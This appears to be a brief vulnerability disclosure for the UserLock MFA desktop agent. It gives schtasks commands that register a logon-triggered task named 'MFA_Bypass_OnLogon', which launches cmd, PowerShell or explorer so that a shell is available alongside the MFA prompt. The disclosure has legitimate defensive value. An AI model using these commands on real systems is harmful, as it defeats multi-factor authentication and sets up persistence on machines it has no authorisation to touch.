Vendor Homepage: https://www.isdecisions.com/products/userlock/help/#
Software : Tested with the Userlock 'Desktop agent' to protect interactive sessions on workstations or on terminal servers.
Description: Userlock is a Multi-Factor Authentication solution for Windows Active Directory & Cloud Environments to stop unauthorized and unwanted access. It enables customized, two-factor authentication (2FA) on Windows logon, Remote Desktop (RDP & RD Gateway), IIS, VPN and Cloud Applications.Userlock allows you to implement MFA to your Active Directory logons domain joined workstations and servers. A dialog box is prompted where you can enter the OTP code, from the Authenticatior App at first logon of the day to their workstation. Userlock integrates with the logon process to deliver two-factor authentication.
One of the most commonly exploited strategies employed by threat actors to build persistence on a victim's computer is task scheduling. The adversary frequently use this strategy to evade automated detection, maintain persistence, and carry out surprise attacks after long periods of lying low.
Vulnerability:
Create a scheduled task that executed after at log on of any user.
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c powershell.exe"
After successfully logging on with the domain credentials, scheduled cmd.exe is prompted with the Userlock MFA dialog box.
> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c explorer.exe"